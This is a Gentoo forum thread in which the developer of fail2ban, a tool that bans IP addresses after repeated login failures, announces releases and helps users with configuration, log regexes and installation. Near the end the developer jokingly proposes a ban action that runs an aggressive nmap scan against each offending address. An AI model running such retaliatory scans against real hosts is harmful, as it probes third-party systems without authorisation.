# Fail2Ban --> SSHD, Apache, firewall and login failures

## LostControl

Hello,

I develop a small tool named fail2ban. I just do some publicity for it  :Very Happy: 

 *Quote:*   

> Fail2ban scans log files like /var/log/pwdfail and bans IP that makes too many password failures. It updates firewall rules to reject the IP address. Currently ssh, iptables, ipfwadm and ipfw are supported. Needs log4py.

 

You can find it on sourceforge.net --> http://fail2ban.sourceforge.net

Ebuilds are available here --> http://fail2ban.sourceforge.net/ebuilds

I need testing, comments, bug reports, ...  :Very Happy: 

Thank you

----------

## LostControl

Hi,

After several months of inactivity, a new release of Fail2Ban is available  :Very Happy: 

Fail2Ban can now supervise several log files and supports regular expressions. Thus you can protect your Apache authentifications against brute force or your SSH accounts for example.

Homepage --> http://fail2ban.sourceforge.net

Ebuilds --> http://fail2ban.sourceforge.net/ebuilds

A+

----------

## LostControl

A new version is available :

 *Quote:*   

> ver. 0.3.1 (03/31/2005) - beta
> 
> ----------
> 
> - Corrected level of messages
> ...

 

Homepage --> http://fail2ban.sourceforge.net

----------

## amne

Moved from Networking & Security.

----------

## feld

Sounds like a GREAT concept. I have no CURRENT need for it, but if I was a systems admin I would LOVE to have this utility.

Keep up the good work and creating useful products for the Linux community!

-Feld

----------

## grenouille

nice!

thanks  :Very Happy: 

----------

## LostControl

Thanks for your encouragements  :Very Happy: 

And here is the first stable version of Fail2Ban:

```
ver. 0.4.0 (04/24/2005) - stable

----------

- Fixed textToDNS which did not recognize strings like

  "12-345-67-890.abcd.mnopqr.xyz"
```

There is only one bug fix since 0.3.1. Do not hesitate to test it  :Wink: 

Homepage: http://fail2ban.sourceforge.net

----------

## freelight

Looks very nice, I think I'll be making use of this on a server I run.

Have you tried getting this added to Portage (submit the ebuild to the Gentroo bugzilla)?

----------

## LostControl

 *freelight wrote:*   

> Looks very nice, I think I'll be making use of this on a server I run.
> 
> Have you tried getting this added to Portage (submit the ebuild to the Gentroo bugzilla)?

 

Not yet ! I wanted to have a "stable" version before. It seems that it is the time to fill up a bug report  :Wink: 

If you test it, I would really appreciate your feedback.

Thank you

----------

## grenouille

this should be in the official portage tree tbh  :Very Happy: 

----------

## LostControl

 *grenouille wrote:*   

> this should be in the official portage tree tbh 

 

I've filled up a bug report so... wait and see  :Wink: 

----------

## christsong84

looks real useful for me too...I think I'm going to use it...I'll let ya know if I find any problems ^_^

----------

## LostControl

Version 0.4.1 is available  :Very Happy: 

Just a small bug fix and modifications of the configuration file for readability. A initd script for Gentoo is now available.

A+

----------

## prymitive

2 errors in 0.4.1 ebuild:

instinto /etc

should be 

insinto /etc

also the /etc/init.d/fail2ban script must be executable but after emerge it isnt.

Great tool, it ban's a lot  :Wink: 

----------

## LostControl

 *prymitive wrote:*   

> 2 errors in 0.4.1 ebuild:
> 
> instinto /etc
> 
> should be 
> ...

 

Many thanks  :Very Happy: 

Now, the ebuild should be correct !

----------

## LostControl

Hi,

A new version of Fail2Ban is available. Lots of new features are included.

```
ver. 0.5.0 (2005/07/12) - beta

----------

- Added support for CIDR mask in ignoreip

- Added mail notification support

- Fixed bug #1234699

- Added tags replacement in rules definition. Should allow a

  clean solution for Feature Request #1229479

- Removed "interface" and "firewall" options

- Added start and end commands in the configuration file.

  Thanks to Yaroslav Halchenko

- Added firewall rules definition in the configuration file

- Cleaned fail2ban.py

- Added an initd script for RedHat/Fedora. Thanks to Andrey

  G. Grozin
```

Please test this version and report any bugs in order to make it stable as soon as possible.

Homepage: http://fail2ban.sourceforge.net

Ebuilds: http://fail2ban.sourceforge.net/ebuilds

Thank you

----------

## quat

this tool is great. finally i have peace and quiet on my box  :Very Happy: 

however is possible to ban a person who tries to find a root password ? i.e. in logs somtimes even more than 500 

times I have:

```
 Jul 15 11:10:28 solid sshd[11251]: User root not allowed because not listed in AllowUsers
```

I disabled the root access through ssh but still I'm wondering, is it possible to ban such ip ?

many thanx,

quat

----------

## LostControl

 *quat wrote:*   

> however is possible to ban a person who tries to find a root password ? i.e. in logs somtimes even more than 500 times I have:
> 
> ```
>  Jul 15 11:10:28 solid sshd[11251]: User root not allowed because not listed in AllowUsers
> ```
> ...

 

If there is no IP address in the log message, fail2ban won't be able to ban it  :Wink:  But in my logs I get thinks like:

```
Jul 15 12:38:33 [sshd] User root not allowed because not listed in AllowUsers

Jul 15 12:38:33 [sshd] Failed password for invalid user root from 61.75.4.142 port 42549 ssh2
```

So this login attempt should be detected by fail2ban. Thus root logins are detected as any other login attempts and should be banned.

----------

## quat

i didn't have such entries in log, but I changed the log level in sshd and now finally such ips can be logged and banned.

thanx for help,

quat

----------

## cyan051

nice little software, but a major P.I.T.A. with timeregex and timpattern settings...

this would be from my ssh log:

```
2005/08/29 21:21:51; 26; src@helios.next; auth; info; sshd[21331]: Invalid user qwerty from 192.168.1.10

2005/08/29 21:21:51; 26; src@helios.next; auth; info; sshd[21331]: Failed none for invalid user qwerty from 192.168.1.10 port 56433 ssh2

2005/08/29 21:21:51; 21; src@helios.next; auth; alert; sshd(pam_unix)[21337]: check pass; user unknown

2005/08/29 21:21:51; 25; src@helios.next; auth; notice; sshd(pam_unix)[21337]: authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=notepad.next
```

as you can see, my logger (syslog-ng) uses this format:

```
template("$YEAR/$MONTH/$DAY $HOUR:$MIN:$SEC; $TAG; $FULLHOST; $FACILITY; $PRIORITY; $MESSAGE\n")
```

so, how do i set up properly timeregex and timepattern in fail2ban?

i've tried

```
timeregex = \d{4}\/\d{2}\/d{2} \d{2}:\d{2}:\d{2} 

timepattern = %%Y\/%%m\/%%d %%H:%%M:%%S
```

and couple of other mutations, but nothing worked...

----------

## LostControl

Hi,

Thanks for using Fail2Ban  :Wink: 

Here are the correct regexp:

```
timeregex = \d{4}\/\d{2}\/\d{2} \d{2}:\d{2}:\d{2}

timepattern = %%Y/%%m/%%d %%H:%%M:%%S
```

And be aware that 192.168.0.0/16 is ignored by default. You can change this in fail2ban.conf (ignoreip).

A+

----------

## cyan051

great...thnx...

one wish: mail notification should include more detailed input

- which policy was violated (if there is more than one active policy - apache, ssh, etc.)

- for which user it was violated (seen in ssh logs)

otherwise, a great tool...

----------

## alinv

One more thing about mail alerts: they all appear to be sent on 01.01.1970.

----------

## cyan051

that sounds a bit strange...

on my system it definitly shows the right time stamp...

----------

## alinv

The latest version fixed this. I was still using 0.5.2. My bad

BTW, fail2ban should definitely go into portage.

----------

## alinv

Another problem:

If I rebuild my firewall rules w/o restarting fail2ban, I still get alert mails about an ip being banned, but fail2ban.log says another thing:

```
2005-10-10 22:30:00,627 WARNING: Ban 82.76.34.117

2005-10-10 22:30:00,642 ERROR: 'iptables -I fail2ban-ssh 1 -s '82.76.34.117' -j DROP' returned 256
```

IMO, fail2ban should either test the existence of the fail2ban-ssh chain and re-create it, or it should send an error message.

----------

## LostControl

Thank you,

Many people complains about this. We will improve this before 0.6 which should appear soon  :Very Happy: 

Stop fail2ban before iptables and start it after iptables to avoid the problem. Some firewall scripts also flush iptables rules in order to recreate them. You will also need to restart fail2ban in this case.

A+

----------

## Tanisete

I'm trying your tool in my system, but i don't understand something:

```
2005-10-22 12:43:41,582 WARNING: Restoring firewall rules...

2005-10-22 12:43:41,594 ERROR: 'iptables -D INPUT -p tcp --dport http -j fail2ban-http

iptables -D fail2ban-http -j RETURN

iptables -X fail2ban-http' returned 256

2005-10-22 12:43:41,606 ERROR: 'iptables -D INPUT -p tcp --dport ssh -j fail2ban-ssh

iptables -D fail2ban-ssh -j RETURN

iptables -X fail2ban-ssh' returned 256

2005-10-22 12:43:41,607 INFO: Exiting...

2005-10-22 12:43:42,803 INFO: Fail2Ban v0.5.4 is running

2005-10-22 13:40:40,741 WARNING: Restoring firewall rules...

2005-10-22 13:40:40,764 INFO: Exiting...

2005-10-22 13:40:41,961 INFO: Fail2Ban v0.5.4 is running

```

Is this the same it was commented before in the thread?

Thanks for developing it!

----------

## LostControl

 *Tanisete wrote:*   

> Is this the same it was commented before in the thread?

 

Yes, probably  :Confused:  I'm sorry, Fail2ban 0.6 is not out yet  :Sad:  I'm a bit busy these days and I have not a lot of time to fix bugs.

 *Tanisete wrote:*   

> Thanks for developing it!

 

Thank you for using it  :Wink: 

----------

## Tanisete

Ok, thanks for answering! No problem, it's working fine here... 30 banned ip up to now  :Smile: 

----------

## LostControl

Hi,

A new testing version is out  :Very Happy:  You can download an ebuild for 0.5.5 from here.

The problem with missing chains (firewall rules flush by another software) should be fixed (reinitialization of Fail2ban chains and restoration of the rules). Thanks to Yaroslav Halchenko (Debian maintainer) who did a lot for this release.

A+

----------

## OneInchMen

Isn't it about time to get this added to the main portage tree? I'm using fail2ban for over a month now and it really helps to cut down the attacks on port 22 (ssh), no problems here...

Even if you think fail2ban isn't stable enough, get it in the tree masked and/or unstable. I'll be glad to add it to portage.unmask and .keywords...

----------

## alinv

 *OneInchMen wrote:*   

> Isn't it about time to get this added to the main portage tree? I'm using fail2ban for over a month now and it really helps to cut down the attacks on port 22 (ssh), no problems here...
> 
> Even if you think fail2ban isn't stable enough, get it in the tree masked and/or unstable. I'll be glad to add it to portage.unmask and .keywords...

 

I strongly agree.

----------

## LostControl

I already filled up a bug report more than 6 months ago --> https://bugs.gentoo.org/show_bug.cgi?id=90339

Fail2ban is still looking for a maintainer  :Sad:  It is already in Debian unstable.

I was waiting for the next stable version to bump the Gentoo bugzilla report. You can add yourself to the CC list. You will be notify of the latest news about Fail2ban in Portage and devs will see that people are waiting on it  :Very Happy: 

Thank you guys for using this free software  :Wink: 

----------

## ercete

Great job !

I use it since few weeks and it works cery well.

I'm just searchin a simple command for unbanning an IP according to fail2ban.

Is it possible ?

----------

## alinv

Have a look at the fwunban command in fail2ban.conf, it's self-explanatory.

----------

## ercete

Excellent, thank you !

as alias in .bashrc it's great  :Wink: 

----------

## Tanisete

Another stupid question: in ssh I also want to ban people who try a user that is not listed in allowusers. Is it enough to have this in fail2ban.conf?

```
failregex = authentication failure|Failed password|not allowed because not listed in AllowUsers
```

Thanks a lot! 0.5.5 working here without problems

----------

## LostControl

 *Tanisete wrote:*   

> Another stupid question: in ssh I also want to ban people who try a user that is not listed in allowusers. Is it enough to have this in fail2ban.conf?
> 
> ```
> failregex = authentication failure|Failed password|not allowed because not listed in AllowUsers
> ```
> ...

 

Mmmhhh... OpenSSH also generate a "Failed password" if someone not listed in AllowUsers try to log in. Thus, it should not be needed to add a match on "not allowed because not listed in AllowUsers".

```
Nov  6 16:17:07 [sshd] User root from qz150.internetdsl.tpnet.pl not allowed because not listed in AllowUsers

Nov  6 16:17:07 [sshd] error: Could not get shadow information for NOUSER

Nov  6 16:17:07 [sshd] Failed password for invalid user root from 80.55.51.150 port 2363 ssh2
```

I will release 0.6 soon. Thanks for reporting a success story  :Very Happy: 

----------

## Tanisete

Hum, that's not my case. Is it enough to change LogLevel to VERBOSE?

Thanks!!

----------

## c4

Got this running on one of my servers now, thankyou for such a great tool!

Working excellent for my purposes.   :Very Happy: 

----------

## newtonian

Hi-

I'm new to ebuilds and I'm not sure if I installed this correctly.  Let me know if I did something wrong.

I used this page as a reference:

http://gentoo-wiki.com/HOWTO_Installing_3rd_Party_Ebuilds

Get the ebuild:

```
cd /tmp

mkdir fail2ban

cd fail2ban

wget http://fail2ban.sourceforge.net/ebuilds/fail2ban-0.5.5.ebuild
```

looked at the current portage layout:

```
ls /usr/portage/
```

```
mkdir -p /usr/local/portage/net-misc/fail2ban

cp fail2ban-0.5.5.ebuild /usr/local/portage/net-misc/fail2ban/

```

make sure you have this line in your /etc/make.conf

if not add it

 *Quote:*   

> PORTDIR_OVERLAY="/usr/local/portage"

 

Finish the install:

```
ebuild /usr/local/portage/net-misc/fail2ban/fail2ban-0.5.5.ebuild digest

echo "net-misc/fail2ban ~x86" >> /etc/portage/package.keywords

emerge fail2ban
```

Configure and Start:

```
vim /etc/fail2ban.conf

/etc/init.d/fail2ban start

rc-update add fail2ban default
```

It seemed to emerge fine.  I'm just wondering if this is what everybody else

does when they install fail2ban.  If this is correct, hopefully it will help out 

people new to gentoo and or 3rd party ebuilds, wanting to install fail2ban.

Cheers,Last edited by newtonian on Wed Nov 16, 2005 9:22 pm; edited 1 time in total

----------

## c4

Looks great newtonian

I put fail2ban in /usr/local/portage/net-firewall/  but the principle is just the same.

If fail2ban is added to the official portage tree some day then one might have to adjust the paths in the local portage as well, or else specify to emerge dir/fail2ban to tell them apart. (for example, compair current situation with dev-php/php and dev-lang/php)

----------

## newtonian

 *c4 wrote:*   

> Looks great newtonian
> 
> I put fail2ban in /usr/local/portage/net-firewall/  but the principle is just the same.
> 
> If fail2ban is added to the official portage tree some day then one might have to adjust the paths in the local portage as well, or else specify to emerge dir/fail2ban to tell them apart. (for example, compair current situation with dev-php/php and dev-lang/php)

 

Thanks, I wanted to install this on several machines and didn't want to find out I was doing it wrong

1/2 way through the process.

Thanks,  :Wink: 

----------

## namo

Hello,

I have just started using your program and I must say I'm really pleased with it, so thank you !   :Very Happy: 

I changed the default match for sshd because it would sometimes be triggered twice (but I have only done few tests). It is also watching squirrelmail and pure-ftpd.

Just a small (?) feature request : would it be possible to have per-module 'maxfailures' parameters ? Say I want 6 for apache but 2 for ssh, for instance... You could still keep a default global setting.

And a thought just crossed my mind : can the same log file be watched by two separate modules or should it to be split ? I think I'll try to figure for myself anyway.

namo

----------

## LostControl

Hi,

 *namo wrote:*   

> I have just started using your program and I must say I'm really pleased with it, so thank you !  

 

Thank you  :Wink: 

 *namo wrote:*   

> It is also watching squirrelmail and pure-ftpd.

 

Could you share your configuration sections? I could include them into the default configuration file with your agreement.

 *namo wrote:*   

> Just a small (?) feature request : would it be possible to have per-module 'maxfailures' parameters ? Say I want 6 for apache but 2 for ssh, for instance... You could still keep a default global setting.

 

Just add a "maxfailures" field in the section to override the default setting  :Wink: 

 *namo wrote:*   

> And a thought just crossed my mind : can the same log file be watched by two separate modules or should it to be split ? I think I'll try to figure for myself anyway.

 

I never try this  :Confused:  However, it should make no difference and work as expected  :Very Happy: 

A+

----------

## Vanquirius

fail2ban is now in Portage as net-analyzer/fail2ban.

Cheers!

----------

## newtonian

 *Vanquirius wrote:*   

> fail2ban is now in Portage as net-analyzer/fail2ban.
> 
> Cheers!

 

Cool-

So to install fail2ban now, all you have to do is:

```
ACCEPT_KEYWORDS="~x86" emerge fail2ban
```

tweak

```

vim /etc/fail2ban.conf

/etc/init.d/fail2ban start

rc-update add fail2ban default

```

and enjoy   :Smile: 

Cheers,

----------

## LostControl

 *Vanquirius wrote:*   

> fail2ban is now in Portage as net-analyzer/fail2ban.
> 
> Cheers!

 

Thank you very much  :Very Happy: 

----------

## federico

I am not able to make failtoban working ...

I am trying in my lan, and I enabled tha ban of the lan.

I have ssh log set to verbose and fail2ban reads /var/log/sshd.log

As I use syslog-ng I've setted those lines 

```

timeregex = \d{4}\/\d{2}\/\d{2} \d{2}:\d{2}:\d{2}

timepattern = %%Y/%%m/%%d %%H:%%M:%%S

```

and decreased the number of failure to 3, but fail2ban never ban anyone...

```

2005-11-21 16:27:01,334 DEBUG: [logreader.py (103)] /var/log/sshd.log has been modified

2005-11-21 16:27:01,335 DEBUG: [logreader.py (134)] /var/log/sshd.log

2005-11-21 16:27:01,336 DEBUG: [logreader.py (122)] Setting file position to 2981L for /var/log/sshd.log

2005-11-21 16:27:03,342 DEBUG: [logreader.py (103)] /var/log/sshd.log has been modified

2005-11-21 16:27:03,343 DEBUG: [logreader.py (134)] /var/log/sshd.log

2005-11-21 16:27:03,345 DEBUG: [logreader.py (122)] Setting file position to 3115L for /var/log/sshd.log

```

I have wrong settings?

Federico

EDIT

My lines about ssh logs:

```

Nov 21 16:16:27 sideralis sshd[12665]: Connection from 192.168.15.5 port 37189

Nov 21 16:16:28 sideralis sshd(pam_unix)[12667]: authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=altair  user=root

Nov 21 16:16:30 sideralis sshd[12665]: error: PAM: Authentication failure for root from altair

Nov 21 16:16:30 sideralis sshd[12665]: Failed keyboard-interactive/pam for root from 192.168.15.5 port 37189 ssh2

Nov 21 16:16:30 sideralis sshd(pam_unix)[12669]: authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=altair  user=root

```

----------

## LostControl

Hi,

Look at your SSH logs and your timeregex/timepattern. It does not correspond  :Wink:  Try with the default settings:

```
# Option:  timeregex

# Notes.:  regex to match timestamp in SSH logfile.

# Values:  [Mar  7 17:53:28]

# Default: \S{3}\s{1,2}\d{1,2} \d{2}:\d{2}:\d{2}

#

timeregex = \S{3}\s{1,2}\d{1,2} \d{2}:\d{2}:\d{2}

# Option:  timepattern

# Notes.:  format used in "timeregex" fields definition. Note that '%' must be

#          escaped with '%' (see http://rgruet.free.fr/PQR2.3.html#timeModule)

# Values:  TEXT  Default:  %%b %%d %%H:%%M:%%S

#

timepattern = %%b %%d %%H:%%M:%%S
```

You should also change your "failregex" to:

```
failregex = Failed keyboard-interactive
```

A+

----------

## federico

Nice tip, now it seems to work:

```

2005-11-22 00:42:06,904 DEBUG: [logreader.py (151)] Found 192.168.15.5

2005-11-22 00:42:06,907 INFO: [fail2ban.py (477)] SSH: 192.168.15.5 has 3 login failure(s). Banned.

2005-11-22 00:42:06,908 WARNING: [firewall.py (89)] SSH: Ban 192.168.15.5

2005-11-22 00:42:06,909 DEBUG: [process.py (129)] iptables -L INPUT | grep -q fail2ban-ssh

2005-11-22 00:42:06,910 DEBUG: [process.py (129)] iptables -I fail2ban-ssh 1 -s '192.168.15.5' -j DROP

```

But I have still a problem, iptables does not work, fail2ban talks about iptables lines but my iptables configuration does not, change, as I can see, also when fail2basstarts I have no new rules in my iptables.

What could I do, or search for?

Federico

PS: I hope to make this working because it's too nice !

----------

## namo

 *LostControl wrote:*   

> 
> 
>  *namo wrote:*   It is also watching squirrelmail and pure-ftpd. 
> 
> Could you share your configuration sections? I could include them into the default configuration file with your agreement.

 

Well, I don't really follow the default way of using an iptables chain per module, so I'll just mention that the string to match is :

```
failregex = Authentication failed
```

Of course, if you have something like that for your logfile :

```
logfile = /var/log/ftpd.log
```

you have to tell syslog-ng to separate your ftp logs (by default pure-ftpd logs to the ftp facility) :

```
destination     ftpd            { file("/var/log/ftpd.log"); };

filter          f_ftpd          { facility(ftp); };

log { source(src); filter(f_ftpd); destination(ftpd); };
```

The time regex is the same.

For squirrelmail, it's a bit more complicated : you have to installe the squirrel_logger plugin (http://www.squeaksoft.com/products/SquirrelLogger/), edit one php file to add a hook for failed logins (it's in the plugin's README), choose a file to log to and turn the plugin on (with the usual conf.pl script).

Then the fail2ban part :

```
failregex = Failed webmail login
```

with the same time regex

 *LostControl wrote:*   

> 
> 
>  *namo wrote:*   Just a small (?) feature request : would it be possible to have per-module 'maxfailures' parameters ? Say I want 6 for apache but 2 for ssh, for instance... You could still keep a default global setting. 
> 
> Just add a "maxfailures" field in the section to override the default setting  

 

Well, that was fast !   :Very Happy: 

 *LostControl wrote:*   

>  *namo wrote:*   And a thought just crossed my mind : can the same log file be watched by two separate modules or should it to be split ? I think I'll try to figure for myself anyway. 
> 
> I never try this  However, it should make no difference and work as expected  

 

I still haven't tried what I had in mind for this...

----------

## LostControl

 *federico wrote:*   

> But I have still a problem, iptables does not work, fail2ban talks about iptables lines but my iptables configuration does not, change, as I can see, also when fail2basstarts I have no new rules in my iptables.
> 
> What could I do, or search for?
> 
> Federico
> ...

 

Just remove command line option "-d" and/or set "debug = false". Debug mode DOES NOT EXECUTE commands but just print them in the log.

I will change this feature in the next development branch. You are not the first to report this "problem". If you want to have more verbosity, use "-vv".

Fail2ban should work now  :Very Happy: 

----------

## LostControl

 *namo wrote:*   

> Well, I don't really follow the default way of using an iptables chain per module, so I'll just mention that the string to match is :
> 
> ```
> failregex = Authentication failed
> ```
> ...

 

Thank you  :Very Happy:  Will be added in a future release.

----------

## federico

 *LostControl wrote:*   

> Just remove command line option "-d" and/or set "debug = false". Debug mode DOES NOT EXECUTE commands but just print them in the log.
> 
> I will change this feature in the next development branch. You are not the first to report this "problem". If you want to have more verbosity, use "-vv".
> 
> Fail2ban should work now 

 

It works  :Smile: 

It was not clear that thing about -d, i thougt tha debugging was sort of seeing a lot of strings printed on my shell  :Smile: 

I hope now to find a lot of banned ip   :Twisted Evil:   :Twisted Evil: 

If it works well I think I am going to put it on all my servers ^_^

Federico

----------

## namo

Another idea I had : I think it would be better to rate-limit the email fail2ban sends. Something like :

```
if (too_many_failures) {

[...]

  # send an alert

  if (now() - last_mail_timestamp > configurable_time) {

     last_mail_timestamp = now();

     send_the_alert();

  }

}

```

This raises the issue of "lost" alerts : so either you'd have to 1) buffer the events and send them in blocks or 2) tell the user from the start that if he sets configurable_time he might lose some alerts and so should check his logs for a full report. 1) is more complicated to implement and begins to make fail2ban be tenshi-like, 2) should be simple and despite the possible lost alerts (which shouldn't be too many, I would set configurable_time to about 10s), I still prefer it to an unchecked flow of emails (I am not sure a DoS ould be possible but I prefer not to take chances...).

I only checked the code superficially, so if some functionality like that is already present, just ignore me   :Wink: 

I'd send you a patch but I need to learn Python and your code !   :Embarassed: 

edit: if you want to take this outside the forum, tell me ! (I'm French btw)

----------

## OneInchMen

Is anybody using fail2bin in combination with PeerGuardian? [ebuild]

Since installing PG, Fail2ban fails to ban ip's, resulting in hundreds of emails and no actions taken... PG does work fine, since one of the 2 proxy's at my work are on a blacklist and get blocked by my homeserver.

----------

## kojiro

I got fail2ban working without iptables. Just hosts.deny. It required some hackery, but for your amusement:

```
[SSH]

enabled = true

logfile = /var/log/sshd/current

fwstart =

fwend   =

fwcheck =

fwban   = IP=<ip> && echo "ALL: $IP" >> /etc/hosts.deny

fwunban = IP=<ip> && sed -i.old s/ALL:\ $IP// /etc/hosts.deny

timeregex = \S{3}\s{1,2}\d{1,2} \d{2}:\d{2}:\d{2}

timepattern = %%b %%d %%H:%%M:%%S

failregex = Authentication failure|Failed password|Invalid user

```

This was just quick-and-dirty, but it works. I'm definitely still working on making those fw(un)ban commands prettier/more useful, and since hosts.deny supports protocol-specific denials, I'm sure I could make this even smarter if I did anything other than ssh. But it's a good proof-of-concept. Who needs iptables?  :Wink: 

----------

## Vanquirius

bug 119036 requests fail2ban stabilization and I intend to do it soon. If you have bugs, I appreciate your input.

----------

## LostControl

 *kojiro wrote:*   

> I got fail2ban working without iptables. Just hosts.deny. It required some hackery, but for your amusement:
> 
> ```
> [SSH]
> 
> ...

 

Hi,

Nice  :Very Happy:  That demonstrates the flexibility of fail2ban  :Wink:  Could I integrate this as an example in fail2ban package?

Netfilter blocks the attacker at kernel level. host.deny is at user level. But the final result is (almost) the same  :Wink:  If you are really paranoïd, you could do that:

```
[SSH]

enabled = true

logfile = /var/log/sshd/current

fwstart =

fwend   =

fwcheck =

fwban   = /etc/init.d/net.eth0 stop

fwunban = /etc/init.d/net.eth0 start

timeregex = \S{3}\s{1,2}\d{1,2} \d{2}:\d{2}:\d{2}

timepattern = %%b %%d %%H:%%M:%%S

failregex = Authentication failure|Failed password|Invalid user

```

 :Laughing: 

I plan to add an ebuild like system for banning/unbanning in the next development version. However, I'm really busy until March  :Crying or Very sad: 

Thank you

----------

## kojiro

 *LostControl wrote:*   

> Could I integrate this as an example in fail2ban package?

 

Sure, of course. One warning -- it adds a blank line to hosts.deny after every unban. I mean to clean that up sometime soon.  :Smile: 

LostControl, I have some questions for you. The current fail2ban ebuild and default configuration works nicely, so I don't want to break it, but I did want to discuss some potential changes before submitting anything to bugzilla.

Proposed change 1: Dependency on firewall

As I demonstrated it's not necessary for fail2ban to rely on a firewall service to successfully ban baddies. Nevertheless the default configuration is for iptables, and that seems to be your intent. I propose a USE flag that determines whether or not a firewall gets installed along with Fail2ban.

Proposed change 2: Fail2ban runs as root

Fail2ban is currently configured to run as root. It's simple enough to create and run as a fail2ban user and group, but fail2ban is so flexible, it's hard to predict exactly what permissions to give that user. The default configuration could (again) be for iptables.

What do you think?

********************************************************************************

 *LostControl wrote:*   

> If you are really paranoid, you could do:
> 
> ```
> fwban   = /etc/init.d/net.eth0 stop
> 
> ...

 

Then every dictionary attack becomes a DoS.  :Wink: 

----------

## LostControl

 *kojiro wrote:*   

>  *LostControl wrote:*   Could I integrate this as an example in fail2ban package? 
> 
> Sure, of course. One warning -- it adds a blank line to hosts.deny after every unban. I mean to clean that up sometime soon. 

 

Thank you  :Very Happy:  Will be added for 0.6.1.

 *kojiro wrote:*   

> Proposed change 1: Dependency on firewall
> 
> As I demonstrated it's not necessary for fail2ban to rely on a firewall service to successfully ban baddies. Nevertheless the default configuration is for iptables, and that seems to be your intent. I propose a USE flag that determines whether or not a firewall gets installed along with Fail2ban.

 

Fail2ban was designed to use iptables. However, it is flexible enough to work with other kind of firewall without changes in the code. I know that Gentoo devs are not really happy when adding new local USE flags. There is no global "iptables" or "firewall" USE flag. Maybe a warning at the end of the emerge which says:

 *Quote:*   

> * If you want to use the default configuration, please emerge iptables and look at /usr/share/doc/fail2ban-0.6.1/fail2ban.conf.iptables.
> 
> * If you want to use shorewall, please emerge shorewall and look at /usr/share/doc/fail2ban-0.6.1/fail2ban.conf.shorewall.
> 
> * If you want to use host.deny, please look at /usr/share/doc/fail2ban-0.6.1/fail2ban.conf.hostdeny.

 

I do not think it is a good idea to add "iptables", "shorewall" and "hostdeny" USE flag. Maybe a Gentoo dev opinion would be great  :Wink:  Euh... I just discovered that it would be really easy to add shorewall support to Fail2ban  :Very Happy: 

 *Quote:*   

> Dynamic blacklisting is not dependent on the blacklist option in /etc/shorewall/interfaces.
> 
> Example 1. Ignore packets from a pair of systems
> 
>     shorewall drop 192.0.2.124 192.0.2.125
> ...

 

Will do it for 0.6.1  :Wink: 

 *kojiro wrote:*   

> Proposed change 2: Fail2ban runs as root
> 
> Fail2ban is currently configured to run as root. It's simple enough to create and run as a fail2ban user and group, but fail2ban is so flexible, it's hard to predict exactly what permissions to give that user. The default configuration could (again) be for iptables.

 

A "fail2ban" would be great for security issues. However, modifications to iptables or host.deny require "root" privileges.

 *kojiro wrote:*   

> ********************************************************************************
> 
>  *LostControl wrote:*   If you are really paranoid, you could do:
> 
> ```
> ...

 

Yes, not really good  :Wink:  What do you think about this one:

```
fwban = nmap -F -TInsane -P0 <ip> >> /var/log/fail2ban-nmap.log
```

Mmmhhh... I suspect a bug with the above rule  :Sad:  I'm pretty sure that Fail2ban will wait the end of the scan  :Confused:  Maybe this could be fix by adding a '&' at the end of the rule. I have to check this.

A+

----------

## LostControl

Now that Fail2ban is in Portage and marked as stable, could a moderator move this thread to Networking & Security?

Thank you

----------

## kojiro

Felicitations! (Sorry, my French is rusty.)

 *LostControl wrote:*   

> Now that Fail2ban is in Portage and marked as stable...

 

LostControl, you should also update your Web site to reflect that! (BTW, Using ACCEPT_KEYWORDS="~x86" on the command line is now officially discouraged.)

 :Razz: 

----------

## Vanquirius

 *kojiro wrote:*   

> (BTW, Using ACCEPT_KEYWORDS="~x86" on the command line is now officially discouraged.)

 

Hey, it's x86 and amd64 stable now  :Wink: .

----------

## Earthwings

Moved from Unsupported Software to Networking & Security.

----------

## LostControl

Hi,

Here is the current CHANGELOG for the next release (in 2-3 weeks maybe less).

```
ver. 0.6.? (200?/??/??) - ???

----------

- Added permanent banning. Set banTime to a negative value to

  enable this feature (-1 is perfect). Thanks to Mannone

- Fixed locale bug. Thanks to Fernando JosÃ©

- Fixed crash when time format does not match data

- Propagated patch from Debian to fix fail2ban search path

  addition to the path search list: now it is added first.

  Thanks to Nick Craig-Wood

- Added SMTP authentification for mail notification. Thanks

  to Markus Hoffmann

- Removed debug mode as it is confusing for people

- Added parsing of timestamp in TAI64N format (#1275325).

  Thanks to Mark Edgington

- Added patch #1382936 (Default formatted syslog logging).

  Thanks to Patrick Börjesson

- Removed 192.168.0.0/16 from ignoreip. Attacks could also

  come from the local network.

- Robust startup: if iptables module does not get fully

  initialized after startup of fail2ban, fail2ban will do

  "maxreinit" attempts to initialize its own firewall. It

  will sleep between attempts for "polltime" number of

  seconds (closes Debian: #334272). Thanks to Yaroslav

  Halchenko

- Added "interpolations" in fail2ban.conf. This is provided

  by the ConfigParser module. Old configuration files still

  work. Thanks to Yaroslav Halchenko

- Added initial support for hosts.deny and shorewall. Need

  more testing. Please test. Thanks to kojiro from Gentoo

  forum for hosts.deny support
```

I added initial support for shorewall and hosts.deny. Do not hesitate to test these new features and report issues. You just need to checkout CVS HEAD. Instructions are available here.

To test shorewall support, copy config/fail2ban.conf.shorewall to /etc/fail2ban.conf

To test hosts.deny support, copy config/fail2ban.conf.hostsdeny to /etc/fail2ban.conf

config/fail2ban.conf.default is now config/fail2ban.conf.iptables

A+

----------

## LostControl

Hi,

I have created an ebuild which install the current CVS HEAD of Fail2ban.

http://fail2ban.sourceforge.net/ebuilds/fail2ban-20060211.ebuild

I would really appreciate if someone could test shorewall and hosts.deny support  :Very Happy: 

Thanks

----------

## xsteadfastx

yesterday i discovered fail2ban and it looks like its exactly what i searched for. but my question is...does it work with metalog? does i need to change something in the config to get it running for metalog? thanks already for this wonderful piece of software.

----------

## LostControl

 *xsteadfastx wrote:*   

> does it work with metalog?

 

Yes of course  :Wink:  I'm using metalog too. For sshd, you can directly monitor "/var/log/pwdfail/current".

A+

----------

## gary441

I get this message in /var/log/fail2ban.log file when i start fail2ban

 WARNING:  is not a valid IP address

I'm not sure where it's coming from. It looks like fail2ban doesn't know what IP to watch.

Any ideas?

Gary

----------

## ryker

Thank you very much for this piece of software.  It seems to be doing a great job for most, but I have noticed some things that it doesn't catch.

For instance, I get this in my logs a lot:

```

Mar 10 17:18:01 emsvs1 sshd[26618]: reverse mapping checking getaddrinfo for www.mproduction.dz failed - POSSIBLE BREAKIN ATTEMPT!

```

I usually get hundreds of lines in a row for things like this.  What can I do to stop this?

Thanks

----------

## ryker

